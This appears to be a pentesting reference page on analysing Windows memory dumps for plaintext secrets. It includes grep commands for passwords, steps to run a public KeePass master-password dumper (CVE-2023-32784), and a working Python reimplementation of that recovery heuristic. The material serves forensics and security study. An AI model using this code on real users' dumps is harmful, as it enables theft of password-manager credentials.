Windows Memory Dump Analysis
A memory dump file (.dmp), also called a crash dump, is a snapshot of a process's (or the whole system's) memory that Windows writes when a program crashes, or that is captured on demand (for example from Task Manager or ProcDump). Because it is raw memory, it frequently contains plaintext secrets that the process had loaded: passwords, tokens, keys, and decrypted data.
Investigation
Static Analysis
We can read the contents of this file with the usual static analysis tools, as below. Note that `strings` with its default settings only extracts 8-bit text; most text inside a Windows process (paths, usernames, anything typed into a GUI field) is stored as UTF-16LE, so also run `strings` with `-e l` to catch those.
strings example.dmp
strings example.dmp | grep -i password
# Open pager
strings example.dmp | less
xxd example.dmp
Using a Debugger
- IDA, ILSpy
- Visual Studio
Using Online Viewer
This file can also be read with an online DMP viewer. Be careful: uploading a dump hands the whole memory image, including any credentials or keys it contains, to a third party, so prefer offline tools for dumps taken from real targets.
Dump KeePass Master Password (CVE-2023-32784)
If the .dmp file contains KeePass memory, we might be able to recover the master password. This vulnerability exists in KeePass 2.x before 2.54: the password text box leaves a leftover string in memory for each keystroke, so every character of the master password except the first can be read back from a memory dump, even after the database has been locked.
keepass-password-dumper is useful to do that.
With the .NET SDK installed (the tool is a C# project), run the following commands.
git clone https://github.com/vdohney/keepass-password-dumper.git
cd keepass-password-dumper
dotnet run example.dmp
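As an added illustration (not the page's own code and not vdohney's tool), the following Python script reimplements the heuristic that CVE-2023-32784 relies on: KeePass 2.x before 2.54 left, for each keystroke in the master-password box, a UTF-16LE string made of ● (U+25CF) masking characters followed by the typed character, so scanning a dump for such runs recovers every character except the first. The dump bytes here are constructed inline to simulate that leak; on a real dump you would pass the file contents to `reconstruct()`.

```python
import re
from collections import Counter, defaultdict

# The masking character KeePass 2.x used in the master-password box, as UTF-16LE.
BULLET = "\u25cf".encode("utf-16-le")  # b'\xcf\x25'


def find_candidates(dump: bytes) -> dict:
    """Scan a raw memory image for leftover strings of the form '●●●c'.

    Returns {position: Counter(char -> number of hits)} where position is the
    0-based index of the recovered character in the password (equal to the
    number of bullets preceding it).
    """
    # One or more bullet pairs followed by one UTF-16LE code unit.
    pattern = re.compile(rb"((?:\xcf\x25)+)(..)", re.DOTALL)
    hits = defaultdict(Counter)
    for m in pattern.finditer(dump):
        n_bullets = len(m.group(1)) // 2
        ch = m.group(2).decode("utf-16-le", errors="replace")
        # Skip terminators / garbage (e.g. the fully masked display string "●●●●\0").
        if not ch.isprintable() or ch == "\u25cf":
            continue
        hits[n_bullets][ch] += 1
    return dict(hits)


def reconstruct(dump: bytes) -> str:
    """Return the most likely password with '?' for unknown positions.

    The first character is never recoverable this way (it has no bullet prefix).
    """
    cands = find_candidates(dump)
    if not cands:
        return ""
    length = max(cands) + 1
    out = ["?"]
    for pos in range(1, length):
        out.append(cands[pos].most_common(1)[0][0] if pos in cands else "?")
    return "".join(out)


def build_sample_dump(password: str) -> bytes:
    """Constructed stand-in for a KeePass memory image (not a real dump).

    Emulates what the vulnerable text box left behind: for the n-th keystroke
    (n >= 2) a string of n-1 bullets followed by the typed character, plus the
    fully masked display string and some unrelated UTF-16LE text as filler.
    """
    filler = "C:\\Users\\alice\\Documents\\Passwords.kdbx".encode("utf-16-le")
    chunks = [filler]
    for n in range(2, len(password) + 1):
        leaked = "\u25cf" * (n - 1) + password[n - 1]
        chunks.append(leaked.encode("utf-16-le") + b"\x00\x00")
        chunks.append(filler)
    # Fully masked copy shown in the UI once typing is done; carries no character.
    chunks.append(("\u25cf" * len(password)).encode("utf-16-le") + b"\x00\x00")
    return b"".join(chunks)


if __name__ == "__main__":
    sample = build_sample_dump("Password123")  # constructed secret, not real data
    for pos, counter in sorted(find_candidates(sample).items()):
        print(f"position {pos}: {counter.most_common(3)}")
    print("recovered:", reconstruct(sample))
```

In real dumps each position usually shows several candidates because of leftover strings from typos and earlier unlocks; printing the per-position counters, as the script does, lets you pick the most frequent one and brute-force the first character separately.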